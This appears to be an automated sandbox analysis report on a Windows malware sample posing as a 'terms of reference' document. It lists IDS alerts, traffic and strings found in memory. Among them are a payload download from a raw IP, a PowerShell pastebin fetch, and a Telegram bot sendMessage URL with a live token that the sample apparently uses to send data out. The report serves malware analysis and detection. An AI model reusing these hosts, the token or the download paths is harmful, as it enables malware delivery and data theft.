Source: global traffic | HTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 172.67.19.24
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 172.67.74.152:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59789 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59786 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59671 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59672 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:60791 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:60792 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59787 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:59788 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 172.67.19.24:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 149.154.167.220:443
Source: global traffic | HTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
    Host: api.telegram.org
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 138
Source: Terms_of_reference_06_01_2025_samsung.scr.exe | String found in binary or memory: http://.css
Source: Terms_of_reference_06_01_2025_samsung.scr.exe | String found in binary or memory: http://.jpg
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/TeamBuild/win32_svchost.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/TeamBuild/win32_svchost.exehttp://89.23.97.214/TeamBuild/win64_svchost.exewin32_
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/TeamBuild/win64_svchost.exeh
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776479000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214:80/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org:80/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.orgnotification_sent.flag
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577649F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.00000257764A9000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org:443/
Source: powershell.exe, 00000009.00000002.2239299222.0000014440981000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000009.00000002.2239299222.0000014440981000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000009.00000002.2338412059.0000014458E00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000002.00000002.2168143247.0000029BCDA86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://exslt.org/common
Source: Terms_of_reference_06_01_2025_samsung.scr.exe | String found in binary or memory: http://html4/loose.dtd
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/8
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/8.46.123.189
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com:80/
Source: powershell.exe, 00000002.00000002.2153023770.0000029BC5704000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F710074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F7101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2110018131.000001F7015DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000002.00000002.2107852680.0000029BB58B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2107852680.0000029BB5691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2110018131.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2107852680.0000029BB58B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CB6000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000002.00000002.2107852680.0000029BB5691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2110018131.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CB6000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577649F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.00000257764A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessageh
Source: powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 
